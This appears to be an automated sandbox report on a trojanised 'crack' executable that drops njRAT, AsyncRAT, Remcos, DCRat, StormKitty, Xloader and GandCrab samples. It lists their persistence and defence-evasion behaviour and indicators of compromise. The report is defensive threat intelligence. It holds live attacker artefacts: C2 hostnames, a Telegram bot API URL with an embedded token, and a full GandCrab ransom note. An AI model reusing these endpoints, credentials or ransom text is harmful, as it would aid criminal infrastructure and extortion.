asyncrat | 3b0cfdd500288507ec287e0e2f33d7acb7a2bcad1537fcfb29a47a4fa7cc23a6

Analysis

max time kernel
3s
max time network
105s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
09-09-2024 21:09

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

クラック.exe
Size

17.8MB
MD5

61bcb94052e57f07e8c662a80d8c29c1
SHA1

db9d2e9e37eddedc1722727e8ce5a0a242a9ff10
SHA256

3b0cfdd500288507ec287e0e2f33d7acb7a2bcad1537fcfb29a47a4fa7cc23a6
SHA512

7f9f9c2c6cd5dd49baf6791808e5a31c9e4726d27f87aaad8e2df75ab2a0dbf20956d0bab8761a9e742d1fa85052f9f7f0ae8e6cf269a0761053786e547935a1
SSDEEP

49152:U6m1Vv6+nTCnjhT5iD1hTIUGzVnDk7Q3xCDza91PU3i/hv/kklWHvv7vTRZOp6/u:Um

Malware Config

Extracted

Family

njrat

Version

0.7d

Botnet

чучундра

hakim32.ddns.net:2000

safety-bronze.gl.at.ply.gg:4444

Mutex

27b92504703b09d3ee2dae0873e8e3f3

Attributes

reg_key
27b92504703b09d3ee2dae0873e8e3f3
splitter
|'|'|

Extracted

Family

asyncrat

Botnet

Default

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

192.168.1.42:5552

Mutex

bf7b1fe7a7644171a9985ea45221c25c

Attributes

reg_key
bf7b1fe7a7644171a9985ea45221c25c
splitter
|'|'|

Extracted

Family

njrat

Version

0.7d

Botnet

kosomk 555

dovelabobzgnan.ddns.net:5552

Mutex

a8c0d4cf5cfc2cc1149b5e071c2ab5df

Attributes

reg_key
a8c0d4cf5cfc2cc1149b5e071c2ab5df
splitter
|'|'|

Extracted

Family

remcos

Botnet

AUGUST CRYPTER TOOLZ GRACE STUB

teamfavour222.ddns.net :6767

odogwuvisual123.duckdns.org:6767

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
-YFLE4M
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Extracted

Path

F:\$RECYCLE.BIN\S-1-5-21-242286936-336880687-2152680090-1000\OWLTYP-DECRYPT.txt

Ransom Note

---= GANDCRAB V5.0.3 =--- ***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED*********************** *****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE WILL BE DECRYPTION ERRORS***** Attention! All your files, documents, photos, databases and other important files are encrypted and have the extension: .OWLTYP The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. The server with your key is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- | 0. Download Tor browser - https://www.torproject.org/ | 1. Install Tor browser | 2. Open Tor Browser | 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/76acb89d2bc7cc06 | 4. Follow the instructions on this page ---------------------------------------------------------------------------------------- On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. ATTENTION! IN ORDER TO PREVENT DATA DAMAGE: * DO NOT MODIFY ENCRYPTED FILES * DO NOT CHANGE DATA BELOW ---BEGIN GANDCRAB KEY--- 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 ---END GANDCRAB KEY--- ---BEGIN PC DATA--- wfKD6iudumBkmpL8IRr4U4exEVaoOXLtwDwmOrT1y1YWvOiWMx5GYaRdvZZfTpFRuHYL7nxWrrfaTG+Hhh5qBJzzs9MC7736UkGSDDniUJJG8/LFF//kmGmoAZAGLo2j5/wd2UrxMJK+iqKhTkS3ArgAxrZOOOiXrbnhbWMkLHQnbYuWlMClYZxYU6SDxpopRo5r292AV1KIZBZV4APBuUHcKSIr2MWMI0O1MKIP2IpKLE2TS5wNmoQoAHZIP7k/TfrG1tVzlDb3jcZAB3gql9dnWN0lCD4xdg7bDNQrvH1xSi3FCw+6kfktKtizqdynr7r154JiurEmkUXB5+Ki/zc2Qut0GtNYZVrXBiXt/xGFEd4b8idB4tm4Pab3Y5NyPYz32XaispQRTRkqF1PXJPcJ15EHwNAoARPLnK8+Au5ZALyfhGEwg6hrKQ3vxBFKwg70Zi7pDxFI3vbLNeap1wYZNHQRRlOKYDmn1lvgAn90mSDf7SyGQSZnn7Ivlsuw7HIKVYbpfzf2fBccdMBnP2lNhH9XQ3DC2qZAEuDtLkioBZ9MNJGhHpcOfb/LRc8P54k7V/HuibORzJL9NXYEh8sz/ewORahtHP+ZbmbW4eJPXp1eNtQ19EJhJFLe2qhgw2mJLRMzwAtbfjn5E2ENiW4EkrJfTw== ---END PC DATA---

URLs

http://gandcrabmfe6mnef.onion/76acb89d2bc7cc06

Extracted

Family

xloader

Version

2.6

Campaign

eido

Decoy

revellbb.com

tempranillowine.net

viralstrategies.info

blacktxu.com

flfththirdbank.com

vaoex.com

theselfdirectedinvestor.com

vinadelmar.travel

othersidejimmythemonkey.com

jaguar-landrovercenter-graz.com

supremeosterreich.com

chatsubs.com

free99.design

serviciosmvs.com

bongmecams.xyz

malikwoodson.com

onlinegamebox.club

694624.com

yeezyzapatos.club

istanbul-hairtransplant.com

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

DcRat 64 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
5132	schtasks.exe
7120	schtasks.exe
1804	schtasks.exe
6360	schtasks.exe
1252	schtasks.exe
6828	schtasks.exe
6428	schtasks.exe
5160	schtasks.exe
6580	schtasks.exe
1776	schtasks.exe
2664	schtasks.exe
7144	schtasks.exe
2684	schtasks.exe
6960	schtasks.exe
3384	schtasks.exe
1596	schtasks.exe
4064	schtasks.exe
5804	schtasks.exe
6940	schtasks.exe
5720	schtasks.exe
5132	schtasks.exe
4940	schtasks.exe
5196	schtasks.exe
3440	schtasks.exe
5056	schtasks.exe
6740	schtasks.exe
4788	schtasks.exe
2680	schtasks.exe
6984	schtasks.exe
4988	schtasks.exe
4364	schtasks.exe
6604	schtasks.exe
3696	schtasks.exe
8180	schtasks.exe
3312	schtasks.exe
720	schtasks.exe
5552	schtasks.exe
824	schtasks.exe
7668	schtasks.exe
5612	schtasks.exe
2688	schtasks.exe
1780	schtasks.exe
5896	schtasks.exe
7056	schtasks.exe
4948	schtasks.exe
4912	schtasks.exe
6452	schtasks.exe
1928	schtasks.exe
5660	schtasks.exe
5440	schtasks.exe
3468	schtasks.exe
6716	schtasks.exe
6128	schtasks.exe
1628	schtasks.exe
3876	schtasks.exe
6872	schtasks.exe
4912	schtasks.exe
5176	schtasks.exe
7136	schtasks.exe
1252	schtasks.exe
7644	schtasks.exe
7048	schtasks.exe
5836	schtasks.exe
380	schtasks.exe

Process spawned unexpected child process 64 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1780	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1628	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2680	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1596	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	824	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1184	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4668	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4988	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	380	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3468	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1596	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4420	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4364	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4940	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1928	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2688	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3312	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5372	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5212	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5204	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5552	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5440	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5432	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5660	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5716	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5860	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5836	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5880	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6072	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3696	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5132	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1776	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2244	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4948	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6068	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5052	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2684	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5132	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6360	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6564	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7104	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7132	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4064	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1252	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5212	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6072	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1368	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6768	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4992	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5720	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6716	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5176	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5836	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7120	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6604	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4912	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	248	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6872	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6084	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3876	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7048	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5160	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1252	4200	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5804	4200	schtasks.exe

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3884-54-0x0000000000740000-0x0000000000772000-memory.dmp	family_stormkitty
C:\Program Files (x86)\7f1630df6b57af024a3b561bdadc208f.exe	family_stormkitty

Xloader
Xloader is a rebranded version of Formbook malware.
loader xloader
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
C:\Program Files (x86)\7f1630df6b57af024a3b561bdadc208f.exe	family_asyncrat

DCRat payload 4 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Program Files (x86)\5e710462c65fe899466e4fb7c1e33c9a.exe	dcrat
behavioral1/memory/1252-53-0x0000000000740000-0x0000000000816000-memory.dmp	dcrat
C:\Program Files (x86)\73c1c41b9e71c48e752a5cd19fe808b6.exe	dcrat
behavioral1/memory/2544-101-0x00000000004F0000-0x00000000005C6000-memory.dmp	dcrat

Xloader payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/7912-2363-0x0000000000400000-0x000000000042B000-memory.dmp	xloader
behavioral1/memory/2252-2499-0x0000000000650000-0x000000000067B000-memory.dmp	xloader

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exePowershell.exe

pid	process
7136	powershell.exe
6212	powershell.exe
5260	powershell.exe
1872	powershell.exe
6120	powershell.exe
1232	powershell.exe
4680	powershell.exe
4992	powershell.exe
5756	powershell.exe
6780	powershell.exe
6796	powershell.exe
2816	Powershell.exe

Drops file in Drivers directory 1 IoCs

Processes:

BTZ.exe

description ioc process

File created C:\Windows\SysWOW64\DRIVERS\atmarph.sys BTZ.exe
Modifies Windows Firewall 2 TTPs 4 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exe

pid process

6372 netsh.exe
6164 netsh.exe
760 netsh.exe
6392 netsh.exe

description	ioc	process
File created	C:\Windows\SysWOW64\DRIVERS\atmarph.sys	BTZ.exe

pid	process
6372	netsh.exe
6164	netsh.exe
760	netsh.exe
6392	netsh.exe

Executes dropped EXE 21 IoCs

Processes:

2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe7f1630df6b57af024a3b561bdadc208f.exe31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe5e710462c65fe899466e4fb7c1e33c9a.exe34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe57ccb6f0bd910fed428761828ae93553.exe70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe73c1c41b9e71c48e752a5cd19fe808b6.exe75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe938b92958ded4d50a357d22eddf141ad.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exea6a1abaf12a28ea8f6553356c3bdcf57.exeBTZ.exeCat.exeClient.exeDarkest Dungeon setub.exeevil.exefwclt.exeGandcrab5.0.3.exeHappy18.exe

pid	process
644	2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe
3884	7f1630df6b57af024a3b561bdadc208f.exe
4252	31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe
1252	5e710462c65fe899466e4fb7c1e33c9a.exe
4496	34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe
4584	57ccb6f0bd910fed428761828ae93553.exe
232	70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe
2544	73c1c41b9e71c48e752a5cd19fe808b6.exe
2336	75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe
4300	78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe
4120	938b92958ded4d50a357d22eddf141ad.exe
2348	172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe
2888	a6a1abaf12a28ea8f6553356c3bdcf57.exe
912	BTZ.exe
4900	Cat.exe
2304	Client.exe
3400	Darkest Dungeon setub.exe
4748	evil.exe
3224	fwclt.exe
1712	Gandcrab5.0.3.exe
3096	Happy18.exe

Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs

defense_evasion

Safe Mode Boot

T1562.009

Processes:

BTZ.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WOWManager	BTZ.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WOWManager\ = "Service"	BTZ.exe

UPX packed file 11 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe	upx
behavioral1/memory/2348-195-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/2348-488-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/2348-487-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/2348-1645-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/2348-1878-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/2348-2102-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/2348-2300-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/2348-2502-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/2348-2717-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/2348-2900-0x0000000000400000-0x000000000048A000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Program Files (x86)\Darkest Dungeon setub.exe	vmprotect

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

28 discord.com
110 discord.com

flow	ioc
28	discord.com
110	discord.com

Drops file in System32 directory 5 IoCs

Processes:

Happy18.exe

description	ioc	process
File created	C:\Windows\SysWOW64\Ska.exe	Happy18.exe
File opened for modification	C:\Windows\SysWOW64\Ska.exe	Happy18.exe
File created	C:\Windows\SysWOW64\Ska.dll	Happy18.exe
File created	C:\Windows\SysWOW64\wsock32.ska	Happy18.exe
File opened for modification	C:\Windows\SysWOW64\wsock32.dll	Happy18.exe

Drops file in Program Files directory 26 IoCs

Processes:

クラック.exe5e710462c65fe899466e4fb7c1e33c9a.exe

description	ioc	process
File created	C:\Program Files (x86)\BTZ.exe	クラック.exe
File created	C:\Program Files (x86)\kosomk.exe	クラック.exe
File created	C:\Program Files (x86)\73c1c41b9e71c48e752a5cd19fe808b6.exe	クラック.exe
File created	C:\Program Files (x86)\938b92958ded4d50a357d22eddf141ad.exe	クラック.exe
File created	C:\Program Files (x86)\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe	クラック.exe
File created	C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe	クラック.exe
File created	C:\Program Files (x86)\Darkest Dungeon setub.exe	クラック.exe
File created	C:\Program Files (x86)\Gandcrab5.0.3.exe	クラック.exe
File created	C:\Program Files (x86)\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe	クラック.exe
File created	C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe	クラック.exe
File created	C:\Program Files (x86)\LightNeuronX0.exe	クラック.exe
File created	C:\Program Files (x86)\7f1630df6b57af024a3b561bdadc208f.exe	クラック.exe
File created	C:\Program Files (x86)\Client.exe	クラック.exe
File created	C:\Program Files (x86)\evil.exe	クラック.exe
File created	C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe	クラック.exe
File created	C:\Program Files (x86)\a6a1abaf12a28ea8f6553356c3bdcf57.exe	クラック.exe
File created	C:\Program Files (x86)\Happy18.exe	クラック.exe
File created	C:\Program Files (x86)\Internet Explorer\en-US\sihost.exe	5e710462c65fe899466e4fb7c1e33c9a.exe
File created	C:\Program Files (x86)\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe	クラック.exe
File created	C:\Program Files (x86)\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe	クラック.exe
File created	C:\Program Files (x86)\Cat.exe	クラック.exe
File created	C:\Program Files (x86)\31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe	クラック.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\en-US\sihost.exe	5e710462c65fe899466e4fb7c1e33c9a.exe
File created	C:\Program Files (x86)\Internet Explorer\en-US\66fc9ff0ee96c2	5e710462c65fe899466e4fb7c1e33c9a.exe
File created	C:\Program Files (x86)\fwclt.exe	クラック.exe
File created	C:\Program Files (x86)\5e710462c65fe899466e4fb7c1e33c9a.exe	クラック.exe

Drops file in Windows directory 4 IoCs

Processes:

BTZ.exe73c1c41b9e71c48e752a5cd19fe808b6.exe

description	ioc	process
File created	C:\Windows\1.txt	BTZ.exe
File created	C:\Windows\Registration\CRMLog\101702bd01fbb4	73c1c41b9e71c48e752a5cd19fe808b6.exe
File created	C:\Windows\Registration\CRMLog\938b92958ded4d50a357d22eddf141ad.exe	73c1c41b9e71c48e752a5cd19fe808b6.exe
File opened for modification	C:\Windows\Registration\CRMLog\938b92958ded4d50a357d22eddf141ad.exe	73c1c41b9e71c48e752a5cd19fe808b6.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

